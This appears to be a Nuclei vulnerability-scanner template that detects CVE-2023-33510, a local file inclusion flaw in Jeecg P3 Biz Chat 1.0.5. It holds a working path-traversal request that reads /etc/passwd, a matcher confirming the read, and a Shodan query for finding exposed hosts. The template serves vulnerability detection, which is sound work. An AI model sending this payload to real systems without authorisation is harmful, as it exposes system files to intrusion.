44 lines
1.3 KiB
YAML
44 lines
1.3 KiB
YAML
id: CVE-2023-33510
|
|
|
|
info:
|
|
name: Jeecg P3 Biz Chat - Local File Inclusion
|
|
author: DhiyaneshDK
|
|
severity: high
|
|
description: |
|
|
Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.
|
|
reference:
|
|
- https://twitter.com/momika233/status/1670701256535572481
|
|
- https://carl1l.github.io/2023/05/08/jeecg-p3-biz-chat-1-0-5-jar-has-arbitrary-file-read-vulnerability/
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33510
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2023-33510
|
|
cwe-id: CWE-668
|
|
epss-score: 0.00291
|
|
cpe: cpe:2.3:a:jeecg_p3_biz_chat_project:jeecg_p3_biz_chat:1.0.5:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
verified: "true"
|
|
shodan-query: http.favicon.hash:1380908726
|
|
framework: wordpress
|
|
vendor: jeecg_p3_biz_chat_project
|
|
product: jeecg_p3_biz_chat
|
|
tags: cve,cve2023,jeecg,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|